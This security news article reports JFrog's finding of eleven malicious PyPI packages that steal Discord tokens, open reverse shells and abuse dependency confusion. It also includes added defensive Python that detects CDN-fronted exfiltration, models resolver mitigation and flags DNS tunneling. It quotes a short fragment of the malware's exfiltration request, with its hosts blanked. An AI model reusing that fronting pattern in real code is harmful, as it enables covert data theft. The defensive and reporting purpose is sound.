Experts found 11 malicious Python packages in the PyPI repository

Pierluigi Paganini November 21, 2021

Researchers discovered 11 malicious Python packages in the PyPI repository that can steal Discord access tokens, passwords, and conduct attacks.

JFrog researchers have discovered 11 malicious Python packages in the Python Package Index (PyPI) repository that can steal Discord access tokens, passwords, and even carry out dependency confusion attacks.

Below is the list of malicious Python packages:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10 / 10Cent11
  • yandex-yt
  • yiffparty

The packages “importantpackage,” “10Cent10,” and “10Cent11” were able to establish a reverse shell on the compromised machine.

Experts pointed out that the “importantpackage” abused CDN TLS termination for data exfiltration. It uses the Fastly CDN to disguise communications with the C2 server as a communication with

“The malware’s communication is quite simple:

from urllib import request

url = "" + "/images" + "?" + "guid=" + b64_payload   # fronted CDN host (blank in the quoted excerpt) plus the base64-encoded payload
r = request.Request(url, headers = {'Host': ""})     # Host header names the real origin behind the CDN (also blank in the excerpt)

This code causes an HTTPS request to be sent to (which is indistinguishable from a legitimate request to PyPI), which later gets rerouted by the CDN as an HTTP request to the C2 server (and vice versa, allowing for two-way communication).” states the report published by JFrog.
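The request shape described in the quoted excerpt has a distinctive on-the-wire tell: the TLS/URL host is a CDN-fronted domain, while the HTTP Host header names a different origin, and the payload travels base64-encoded in a query parameter. The following added example (not code from the JFrog report or from the packages) shows how an egress-inspection hook could flag both properties. The host names, the sample payload and the header values are constructed placeholders, and the `assess_request` function and its helpers are hypothetical.

```python
import base64
import binascii
from urllib.parse import urlsplit

# Constructed sample of a fronted request: the URL points at a CDN-fronted host,
# the Host header at a different origin, and the query carries a base64 blob.
SAMPLE_PAYLOAD = base64.b64encode(b"hostname=build-01;user=ci;os=linux").decode()
SUSPICIOUS_URL = "https://cdn-fronted-placeholder.example/images?guid=" + SAMPLE_PAYLOAD
SUSPICIOUS_HEADERS = {"User-Agent": "pip/21.3", "Host": "c2-origin-placeholder.example"}

# Constructed benign request for comparison: no Host override, no encoded query data.
BENIGN_URL = "https://pypi.org/simple/requests/"
BENIGN_HEADERS = {"User-Agent": "pip/21.3"}


def query_values(url):
    """Split the query string without '+' or percent decoding so base64 text survives intact."""
    values = {}
    for part in urlsplit(url).query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        values.setdefault(key, []).append(value)
    return values


def host_header_mismatch(url, headers):
    """True when an explicit Host header names a different host than the URL itself."""
    url_host = (urlsplit(url).hostname or "").lower()
    for name, value in headers.items():
        if name.lower() == "host":
            declared = value.split(":")[0].strip().lower()  # drop an optional port
            return declared != url_host
    return False


def looks_base64(value, min_len=16):
    """Strict base64 check (standard or URL-safe alphabet) for values long enough to carry data."""
    if len(value) < min_len:
        return False
    for altchars in (None, b"-_"):
        try:
            base64.b64decode(value, altchars=altchars, validate=True)
            return True
        except (binascii.Error, ValueError):
            continue
    return False


def base64_query_params(url):
    """Names of query parameters whose value decodes as base64."""
    return [k for k, vals in query_values(url).items() if any(looks_base64(v) for v in vals)]


def assess_request(url, headers):
    """Findings for one outbound request, in a fixed order so results are easy to compare."""
    findings = []
    if host_header_mismatch(url, headers):
        findings.append("host-header-mismatch")
    if base64_query_params(url):
        findings.append("base64-query-param")
    return findings


if __name__ == "__main__":
    print(assess_request(SUSPICIOUS_URL, SUSPICIOUS_HEADERS))  # both findings
    print(assess_request(BENIGN_URL, BENIGN_HEADERS))          # []
```

A Host/URL mismatch alone is not proof of fronting (some legitimate clients set it when talking to load balancers), so the two signals are reported separately and a real deployment would correlate them with the destination's reputation and the process that made the request.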

The “ipboards” and “trrfab” packages were able to exfiltrate sensitive information by using a technique called dependency confusion.

The dependency confusion technique consists of uploading tainted components to public repositories under the same name as an organization's legitimate internal private packages, but with a higher version number. Because the package manager prefers the highest available version, it is tricked into downloading and installing the malicious module instead of the internal one.
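The mechanism is easiest to see by modelling the resolver's choice. The added example below (not code from the report or from pip) simulates an installer that pools candidates from a private and a public index and picks the highest version, which is how pip behaves when a private index is supplied via `--extra-index-url`, alongside the mitigation of serving internal names only from the private index. The package names, versions and the two index inventories are constructed, and `parse_version` is a simplified stand-in for PEP 440 ordering.

```python
# Constructed inventories: what a private index and the public index might each list.
# The public "acme-auth" entry plays the role of the attacker's look-alike upload.
PRIVATE_INDEX = {"acme-auth": ["1.4.0", "1.5.2"], "acme-logging": ["0.9.1"]}
PUBLIC_INDEX = {"acme-auth": ["99.0.0"], "requests": ["2.26.0"]}


def parse_version(text):
    """Dotted numeric versions only: a hypothetical simplification of PEP 440 ordering."""
    return tuple(int(part) for part in text.split("."))


def newest(versions):
    return max(versions, key=parse_version)


def resolve_merged(name, private=PRIVATE_INDEX, public=PUBLIC_INDEX):
    """Models an installer that merges both indexes (pip with --extra-index-url):
    every candidate is pooled and the highest version wins regardless of origin."""
    candidates = [("private", v) for v in private.get(name, [])]
    candidates += [("public", v) for v in public.get(name, [])]
    if not candidates:
        return None
    return max(candidates, key=lambda c: parse_version(c[1]))


def resolve_private_first(name, private=PRIVATE_INDEX, public=PUBLIC_INDEX):
    """Models the mitigation: names known to the private index are served only from it,
    and the public index is consulted only for names the private index does not carry."""
    if name in private:
        return ("private", newest(private[name]))
    if name in public:
        return ("public", newest(public[name]))
    return None


def audit_collisions(private=PRIVATE_INDEX, public=PUBLIC_INDEX):
    """List internal names that also exist on the public index, noting whether the public
    release would outrank every internal one under merged resolution."""
    report = []
    for name, versions in private.items():
        if name in public:
            public_newest = newest(public[name])
            shadows = parse_version(public_newest) > parse_version(newest(versions))
            report.append((name, public_newest, shadows))
    return report


if __name__ == "__main__":
    print(resolve_merged("acme-auth"))         # ('public', '99.0.0'): the look-alike wins
    print(resolve_private_first("acme-auth"))  # ('private', '1.5.2')
    print(audit_collisions())                  # [('acme-auth', '99.0.0', True)]
```

In practice the private-first behaviour comes from pointing the installer at a single index (pip's `--index-url` with no `--extra-index-url`) that itself proxies the public index for unknown names, and the audit corresponds to periodically checking whether any internal package name has appeared on PyPI.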

The “ipboards” and “pptest” packages were discovered using DNS tunneling for data exfiltration; this is the first time that this technique has been observed in malicious packages uploaded to PyPI.
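DNS tunneling encodes the exfiltrated data into the subdomain labels of queries for an attacker-controlled zone, so the resolver log is where it shows up. The added example below (not code from the report or from the packages) scores resolver log lines per zone on three signals that tunnels tend to combine: many distinct subdomains, long labels, and high character entropy. The log format, the client address, the zone names and the encoded chunks are all constructed, and `analyse_dns_log` and its thresholds are hypothetical.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict


def _chunk(i):
    # Deterministic stand-in for one encoded exfiltration chunk (constructed, not real traffic).
    digest = hashlib.sha256(f"chunk{i}".encode()).digest()
    return base64.b32encode(digest).decode().lower()[:32]


# Constructed resolver log, one query per line: "<timestamp> <client> <qname> <qtype>".
SAMPLE_LOG = [
    "2021-11-19T10:00:00Z 10.0.0.5 pypi.org A",
    "2021-11-19T10:00:00Z 10.0.0.5 files.pythonhosted.org A",
    "2021-11-19T10:00:01Z 10.0.0.5 www.python.org AAAA",
] + [
    f"2021-11-19T10:00:0{i + 2}Z 10.0.0.5 {_chunk(i)}.tunnel-placeholder.example A"
    for i in range(6)
]


def shannon_entropy(text):
    """Bits of entropy per character of the string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname):
    """Naive split into (subdomain, zone): the last two labels are treated as the zone.
    A real deployment would use the public suffix list instead."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def analyse_dns_log(lines, min_label_len=30, entropy_threshold=3.0, min_unique=5):
    """Return one finding per zone whose subdomains look like an encoded data channel."""
    per_zone = defaultdict(set)
    for line in lines:
        _ts, _client, qname, _qtype = line.split()
        sub, zone = split_name(qname)
        if sub:
            per_zone[zone].add(sub)

    findings = []
    for zone, subs in per_zone.items():
        long_labels = sum(1 for s in subs for label in s.split(".") if len(label) >= min_label_len)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if len(subs) >= min_unique and long_labels and avg_entropy >= entropy_threshold:
            findings.append({
                "zone": zone,
                "unique_subdomains": len(subs),
                "long_labels": long_labels,
                "avg_entropy": round(avg_entropy, 2),
            })
    return findings


if __name__ == "__main__":
    for finding in analyse_dns_log(SAMPLE_LOG):
        print(finding)
```

The three signals are combined rather than used alone because each has benign look-alikes (CDN hostnames are long, content-hash subdomains are high-entropy, busy zones have many names); requiring all three per zone keeps the false-positive rate workable, and the thresholds should be tuned against a baseline of the organization's own resolver traffic.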

“While this set of malicious packages may not have the same ‘teeth’ as our previous discoveries, what’s notable is the increasing level of sophistication with which they are executed. It’s not reaching for your wallet in broad daylight – but there is a lot more subterfuge going on with these packages, and some of them may even be setting up for a follow-up attack after the initial reconnaissance, instead of running a highly-compromising payload to start.” concludes the report.
